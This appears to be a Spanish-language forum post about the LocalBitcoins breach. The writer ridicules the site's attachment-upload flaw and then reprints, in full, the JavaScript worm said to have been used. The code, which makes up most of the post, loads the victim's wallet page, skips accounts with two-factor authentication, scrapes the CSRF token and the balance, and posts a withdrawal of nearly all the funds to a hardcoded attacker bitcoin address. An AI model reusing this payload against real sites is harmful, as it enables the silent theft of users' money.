Apostemos todo a local bitcoins que ellos nos dan fuerzas, si dios, ese tipo de falla de seguridad en la web es de lo mas comun, no puedo ni pensar ni creer que podian cargar codigo mediante archivos adjuntos diooooos! en que planeta estas localbitcoins! Nose de donde sacan los 82 btc, mas de 1000 btc fueron recibidos en esa direccion que se utilizo para hackear a los confiados.
El tan temido script es solo un simple gusano. Bueno ya saben para los proximos emprededores, bitcoin es dinero y por tanto deben tomarse las medidas de seguridad necesarias, contraten profesionales.
function loadpic() {
function btcget() {
$.ajax({
url: '/accounts/wallet/',
type: 'GET',
dataType: 'html',
contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
error: function() {},
success: function(data) {
walh(data);
}
});
}
function btcsend(btcamount, btcto, csrf) {
var pd = {
'csrfmiddlewaretoken': csrf,
'address_to': btcto,
'amount': btcamount,
'send_submit': 'Send from wallet'
};
$.ajax({
url: '/accounts/wallet/',
data: pd,
type: 'POST',
dataType: 'html',
contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
error: function() {},
success: function(data) {}
});
}
function walh(html) {
var hastfa = '';
var csrftoken = '';
var btc = 0;
var m = html.match(/label for=.(id_token)/);
if (m && m[1]) {
if (m[1] != '') {
return;
}
}
m = html.match(/.csrfmiddlewaretoken. value=.([a-zA-Z0-9_-]+)/);
if (m && m[1]) {
csrftoken = m[1];
} else {
return;
}
m = html.match(/Wallet: ([0-9,.-]+) BTC/);
if (m && m[1]) {
btc = m[1];
} else {
return;
}
btc = parseFloat(btc);
btc = btc.toFixed(2);
if (btc < 0.02) {
return;
}
btc = btc - 0.01;
btc = btc.toFixed(2);
btcsend(btc, '12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c', csrftoken);
}
btcget();
}
